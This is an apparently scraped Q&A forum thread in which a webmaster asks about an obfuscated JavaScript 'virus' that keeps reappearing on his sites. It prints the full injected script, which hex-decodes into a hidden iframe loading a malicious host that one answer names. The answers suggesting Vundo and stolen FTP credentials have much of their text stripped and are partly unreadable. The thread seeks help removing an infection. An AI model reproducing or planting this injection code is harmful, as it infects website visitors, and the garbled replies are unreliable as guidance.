Javascript "virus"

Question

Javascript "virus"

I have a problem with some JS virus on all my sites. They are located on different hosts, and on some of them this code appears.

<script>
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) {
    var i49d9f1a846737 = 16;
    return (parseInt(i49d9f1a846377, i49d9f1a846737));
}
function i49d9f1a8472f3(i49d9f1a8476d9) {
    var i49d9f1a848679 = 2;
    var i49d9f1a847da9 = '';
    i49d9f1a848e47 = String.fromCharCode;
    for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) {
        i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679))));
    }
    return i49d9f1a847da9;
}
var r1a = '';
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E';
document.write(i49d9f1a8472f3(i49d9f1a84922e));
</script>

NOD32 blocks the site because it believes that there is a virus. Removing code from sources does not help, because it reappears again. This cannot be the result of XSS because it appears even on static websites.

I tried to do a full check of my system, and that didn't help. The only thing on all websites is Google Analytics, which, I think, could not do this.

edit: you can see this, for example, at http://www.postuj.cz/test/ or http://flavicius.php5.cz/ .

+3

javascript virus

Jakub arnold 06 . '09 14:43

2

Vundo . , , javascript ( , ). Malwarebytes 'Anti-Malware. , . , Vundo .

+7

Ryan Van Antwerp 06 . '09 14:46

bobince · Accepted Answer · 2009-04-06T17:05:01+0000

, .

? , , , ( ).

, , , . iframe http://ecom.rarebreedfootwear.com/? ( - URL-, - ).

: , , , JavaScript, , iframe - . , .

ETA:

, , hxxp://flavicius.php5.cz/

. , URL, . Apache , script .

, , , , , : , , . , , WordPress, .

Javascript "virus"

More articles: